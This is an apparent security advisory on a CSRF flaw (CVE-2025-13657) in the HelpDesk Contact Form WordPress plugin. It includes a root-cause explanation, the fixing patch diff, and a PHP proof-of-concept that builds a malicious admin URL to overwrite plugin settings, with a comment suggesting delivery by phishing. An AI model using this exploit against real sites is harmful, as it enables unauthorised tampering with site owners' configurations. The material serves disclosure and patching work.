Atomic Edge analysis of CVE-2025-13657:
The HelpDesk contact form plugin for WordPress versions up to and including 1.1.5 contains a Cross-Site Request Forgery vulnerability in its settings update functionality. This medium-severity flaw allows attackers to modify critical plugin configuration without proper authorization.
Atomic Edge research identifies the root cause as missing nonce validation in the handle_query_args() function within the class-admin.php file. The vulnerable function processes GET parameters licenseID and contactFormID directly from user input without verifying the request’s authenticity. The function’s original comment incorrectly stated nonce verification was unnecessary because non-admins could not access the page, but this failed to account for CSRF attacks where an admin’s browser could be tricked into making unauthorized requests.
The exploitation method involves crafting a malicious link or webpage that triggers a GET request to the WordPress admin area. An attacker would target the /wp-admin/admin.php endpoint with page=helpdesk parameter, adding licenseID and contactFormID parameters with desired values. When an authenticated administrator visits the malicious URL, their browser automatically sends the request with their session cookies, executing the unauthorized settings update. The attack requires no special payload encoding beyond standard URL parameters.
The patch in version 1.1.6 adds comprehensive nonce validation to the handle_query_args() function. The fix introduces three key changes: a wp_nonce parameter check using wp_verify_nonce(), proper sanitization with sanitize_text_field() and wp_unslash(), and generation of the nonce in the helpdesk-api.php file’s authentication flow. The patch also updates the nonce verification in the create_page_with_hd_form() method to use proper sanitization, demonstrating improved security hygiene throughout the codebase.
Successful exploitation allows attackers to modify the plugin’s license ID and contact form ID settings. This could redirect form submissions to attacker-controlled systems, disrupt legitimate customer support workflows, or cause denial of service by breaking the contact form functionality. While the vulnerability does not directly enable privilege escalation or remote code execution, it undermines the integrity of customer communication channels and could facilitate further social engineering attacks.
--- a/helpdesk-contact-form/helpdesk-contact-form.php
+++ b/helpdesk-contact-form/helpdesk-contact-form.php
@@ -7,7 +7,7 @@
* Plugin Name: HelpDesk Contact Form
* Plugin URI: https://www.helpdesk.com/integrations/wordpress
* Description: Make communication effortless with the WordPress contact form plugin provided by HelpDesk. Create your contact form without any coding and manage all website messages in one spot.
- * Version: 1.1.5
+ * Version: 1.1.6
* Requires at least: 4.6
* Requires PHP: 6.1
* Author: text.com
--- a/helpdesk-contact-form/includes/class-admin-page.php
+++ b/helpdesk-contact-form/includes/class-admin-page.php
@@ -66,12 +66,18 @@
if (!isset($_GET["licenseID"])) {
return;
}
+
+ // Verify nonce to prevent CSRF attacks
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+ if (!isset($_GET["_wpnonce"]) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_GET["_wpnonce"])), "helpdesk_update_settings")) {
+ return;
+ }
+
// phpcs:ignore WordPress.Security.NonceVerification.Recommended
- $licenseID = sanitize_text_field($_GET["licenseID"]);
+ $licenseID = sanitize_text_field(wp_unslash($_GET["licenseID"]));
// phpcs:ignore WordPress.Security.NonceVerification.Recommended
- $contactFormID = sanitize_text_field($_GET["contactFormID"]);
+ $contactFormID = isset($_GET["contactFormID"]) ? sanitize_text_field(wp_unslash($_GET["contactFormID"])) : "";
- // Nonce verification not required there - no sensitive data is being processed and non-admins can't access the page
if (!$licenseID) {
return;
}
@@ -404,7 +410,7 @@
isset($_POST["helpdesk_create_page"]) &&
$_POST["helpdesk_create_page"] == "1"
) {
- if (!isset($_POST['helpdesk_create_page_nonce']) || !wp_verify_nonce($_POST['helpdesk_create_page_nonce'], 'helpdesk_create_page_action')) {
+ if (!isset($_POST['helpdesk_create_page_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['helpdesk_create_page_nonce'])), 'helpdesk_create_page_action')) {
wp_die(esc_html(__('Nonce verification failed', 'helpdesk-contact-form')));
}
$this->create_page_with_hd_form();
--- a/helpdesk-contact-form/includes/class-helpdesk-api.php
+++ b/helpdesk-contact-form/includes/class-helpdesk-api.php
@@ -47,7 +47,11 @@
return $json;
}
- $state = generateUriEncodedJson(admin_url( 'admin.php?page=helpdesk' ));
+ // Generate WordPress nonce for CSRF protection
+ $wp_nonce = wp_create_nonce('helpdesk_update_settings');
+
+ $location_with_nonce = add_query_arg('_wpnonce', $wp_nonce, admin_url('admin.php?page=helpdesk'));
+ $state = generateUriEncodedJson($location_with_nonce);
$url .= '&state=' . urlencode($state);
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13657 - HelpDesk contact form plugin <= 1.1.5 - Cross-Site Request Forgery to Settings Update via handle_query_args
<?php
/**
* Proof of Concept for CVE-2025-13657
* CSRF attack against HelpDesk Contact Form plugin <= 1.1.5
*
* This script generates a malicious URL that, when visited by an authenticated
* WordPress administrator, will update the plugin's license ID and contact form ID
* settings without their knowledge or consent.
*
* Usage: Set $target_url to the WordPress site, then share the generated URL
* with an administrator (via phishing, comments, etc.)
*/
// Configuration
$target_url = 'https://vulnerable-wordpress-site.com'; // Change this to target site
$malicious_license_id = 'attacker-controlled-license';
$malicious_form_id = 'attacker-form-123';
// Construct the CSRF attack URL
$admin_path = '/wp-admin/admin.php';
$parameters = array(
'page' => 'helpdesk',
'licenseID' => $malicious_license_id,
'contactFormID' => $malicious_form_id
);
$attack_url = $target_url . $admin_path . '?' . http_build_query($parameters);
// Output the malicious URL
echo "Atomic Edge CVE-2025-13657 Proof of Conceptn";
echo "============================================nn";
echo "Target: $target_urln";
echo "Vulnerable Plugin: HelpDesk Contact Form <= 1.1.5n";
echo "Attack Type: Cross-Site Request Forgery (CSRF)nn";
echo "Malicious CSRF URL:n";
echo "$attack_urlnn";
// Optional: Demonstrate automatic exploitation via cURL (requires admin cookies)
echo "nTo test exploitation manually:n";
echo "1. Log into WordPress as an administratorn";
echo "2. Visit the URL above in the same browsern";
echo "3. The plugin settings will be updated without confirmationnn";
// Note: This is a GET-based CSRF, so no POST data or JavaScript required
// The attack works because the handle_query_args() function lacks nonce validation
// in vulnerable versions (<= 1.1.5) of the plugin
?>
